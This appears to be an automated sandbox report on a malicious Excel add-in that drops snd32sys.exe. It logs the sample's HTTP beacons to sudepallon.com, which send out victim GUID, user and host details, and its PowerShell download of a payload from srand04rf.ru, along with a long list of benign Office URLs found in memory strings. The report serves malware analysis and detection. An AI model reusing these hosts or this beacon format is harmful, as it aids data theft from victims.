Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Source: C:\Users\Public\snd32sys.exe

Code function: 16_2_00611FC0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

16_2_00611FC0

Source: global traffic	HTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
Source: global traffic	HTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: srand04rf.ru

Source: unknown

HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Source: snd32sys.exe	String found in binary or memory: http://api.ipify.org
Source: snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp	String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: 0708_5355150121.xll	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000002.00000003.226352766.0000000007D51000.00000004.00000001.sdmp, 0708_5355150121.xll	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 0708_5355150121.xll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 0708_5355150121.xll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 0708_5355150121.xll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 0708_5355150121.xll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 0708_5355150121.xll	String found in binary or memory: http://ocsp.comodoca.com0
Source: 0708_5355150121.xll	String found in binary or memory: http://ocsp.sectigo.com0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png8
Source: powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmp	String found in binary or memory: http://srand04rf.ru
Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmp	String found in binary or memory: http://srand04rf.ru/08
Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.dr	String found in binary or memory: http://srand04rf.ru/08.jpg
Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmp	String found in binary or memory: http://srand04rf.ru4&jt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.onedrive.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://augloop.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.entity.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cortana.ai/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://cr.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://directory.services.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://graph.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows.local
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://management.azure.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://management.azure.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://messaging.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officeapps.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://onedrive.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://osi.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 0708_5355150121.xll	String found in binary or memory: https://sectigo.com/CPS0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://settings.outlook.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
